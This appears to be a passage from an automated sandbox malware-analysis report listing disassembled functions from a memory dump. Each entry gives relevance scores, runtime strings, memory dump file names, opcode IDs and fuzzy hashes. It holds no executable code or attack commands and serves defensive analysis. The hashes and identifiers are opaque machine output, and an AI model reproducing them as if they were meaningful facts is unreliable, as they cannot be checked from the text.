                    • Instruction Fuzzy Hash: ACE1BE30605741EFEB24CF29C884B2AB7E0BF88714F144A6EE5A58B6D1D7B4F845CB42
                    Function 043FBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                    Download Yara Rule
                    Strings
                    • RTL: Re-Waiting, xrefs: 04437BAC
                    • RTL: Resource at %p, xrefs: 04437B8E
                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04437B7F
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID:
                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                    • API String ID: 0-871070163
                    • Opcode ID: d6099cf421a7d0c96805398ac803dc6c856edda0950e81b7afd60bd2f585e296
                    • Instruction ID: 5541f9d9d4896c6d8731928ddd70358d3adc2c9aba2f170b1b4a5a4d81349760
                    • Opcode Fuzzy Hash: d6099cf421a7d0c96805398ac803dc6c856edda0950e81b7afd60bd2f585e296
                    • Instruction Fuzzy Hash: D041E2757007029FEB24DE25DC40B6BB7E5EF88715F100A2EEA969B681DB31F8058B91
                    Function 043FB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                    Download Yara Rule
                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0443728C
                    Strings
                    • RTL: Re-Waiting, xrefs: 044372C1
                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04437294
                    • RTL: Resource at %p, xrefs: 044372A3
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                    • API String ID: 885266447-605551621
                    • Opcode ID: 574da246ad382657a98e287f8dae469c0a4c8a79f4b4b212af3bb906dfaff9f4
                    • Instruction ID: b9ed45197898adbf4676aaf0393a00b9569721506774775b41e0cd7257734fac
                    • Opcode Fuzzy Hash: 574da246ad382657a98e287f8dae469c0a4c8a79f4b4b212af3bb906dfaff9f4
                    • Instruction Fuzzy Hash: F54107B1700602AFDB20DE25CC41F66F7A5FB48B15F10461AF995A7781DB31F8168BD1
                    Function 04407D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: __aulldvrm
                    • String ID: +$-
                    • API String ID: 1302938615-2137968064
                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                    • Instruction ID: 6eaf6812d2d91391ce66195cedcdae52d6a5a2f93638f5fbb47cd9a0bdf5249d
                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                    • Instruction Fuzzy Hash: 96918370E002159BEF24DF69C981ABFB7A5AF44760F14C53BE855A73C0E730B9618B62
                    Function 043C9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID:
                    • String ID: $$@
                    • API String ID: 0-1194432280
                    • Opcode ID: df0b90c95047c80fee7eb60fcf5f3703b7a27241dafeba5264112f12d5636b88
                    • Instruction ID: cc28ae36a183abd755d1b4024708f39bfe30c9287a12b1602c6bce750197ac0f
                    • Opcode Fuzzy Hash: df0b90c95047c80fee7eb60fcf5f3703b7a27241dafeba5264112f12d5636b88
                    • Instruction Fuzzy Hash: E0811CB2D002699BDB35CF54CD45BEAB7B8AF08714F0141DAE919B7280E7706E85CFA0